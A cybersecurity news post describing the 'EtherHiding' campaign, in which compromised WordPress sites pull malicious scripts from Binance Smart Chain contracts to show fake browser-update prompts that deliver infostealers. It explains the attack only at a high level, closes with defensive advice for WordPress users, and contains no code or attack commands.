New ‘EtherHiding’ Malware Campaign Compromised Binance’s Smart Chain
The utilization of Binance’s Smart Chain (BSC) contracts by threat actors to distribute malicious code has been seen, leading to the characterization of this activity as an advanced form of bulletproof hosting.
The effort, which was identified approximately two months ago, has been assigned the codename “EtherHiding” by Guardio Labs.
The novel twist represents the most recent development in a continuous campaign that exploits compromised WordPress websites to present deceptive notifications to unsuspecting visitors, urging them to update their web browsers before gaining access to the sites. This deceptive tactic ultimately facilitates the distribution of information-stealing malware, including Amadey, Lumma, or RedLine.
According to security researchers Nati Tal and Oleg Zaytsev, the perpetrators swiftly adapted their approach after their initial strategy of utilizing compromised Cloudflare Worker hosts was thwarted. They promptly shifted their focus towards leveraging the decentralized, anonymous, and publicly accessible attributes of blockchain technology.
“This campaign has become increasingly challenging to identify and dismantle.”
The targeting of WordPress sites by threat actors through the utilization of malicious plugins, as well as the exploitation of publicly revealed security vulnerabilities in widely used plugins, is a predictable occurrence. This provides the capability to gain full control over compromised websites at one’s discretion.
The objective is to retrieve a script in the second stage, which subsequently obtains a payload in the third stage from a command-and-control (C2) server. This is done to distribute fraudulent browser update notifications.
If a victim chooses to click on the update button shown on the deceptive overlay, they will be routed to a download page where a malicious executable file is hosted, typically on platforms such as Dropbox or other respectable file hosting services.
The address and contract in question have been identified as being utilized in a phishing scheme. However, due to the decentralized nature of the hosting service, there is presently no feasible means to interfere and halt the progression of the attack.
According to the researchers, visitors of hijacked WordPress sites are unaware of the activities occurring behind the scenes, as the address in question is not utilized for any financial or other transactions that may potentially deceive victims into transferring dollars or intellectual property.
The contract in question, which has been labeled as counterfeit, malevolent, or similar in nature, remains accessible on the internet and carries out its malevolent actions.
Given the increasing vulnerability of WordPress plugins as a potential target for attacks, it is advisable for users who depend on the content management system (CMS) to adhere to security best practices. This includes regularly updating their systems with the latest patches, removing unnecessary administrative users, and implementing robust password policies.
About The Author:
Yogesh Naager is a content marketer who specializes in the cybersecurity and B2B space. Besides writing for the News4Hackers blog, he’s also written for brands including CollegeDunia, Utsav Fashion, and NASSCOM. Naager entered the field of content in an unusual way. He began his career as an insurance sales executive, where he developed an interest in simplifying difficult concepts. He also combines this interest with a love of narrative, which makes him a good writer in the cybersecurity field. In the bottom line, he frequently writes for Craw Security.
Read More Article Here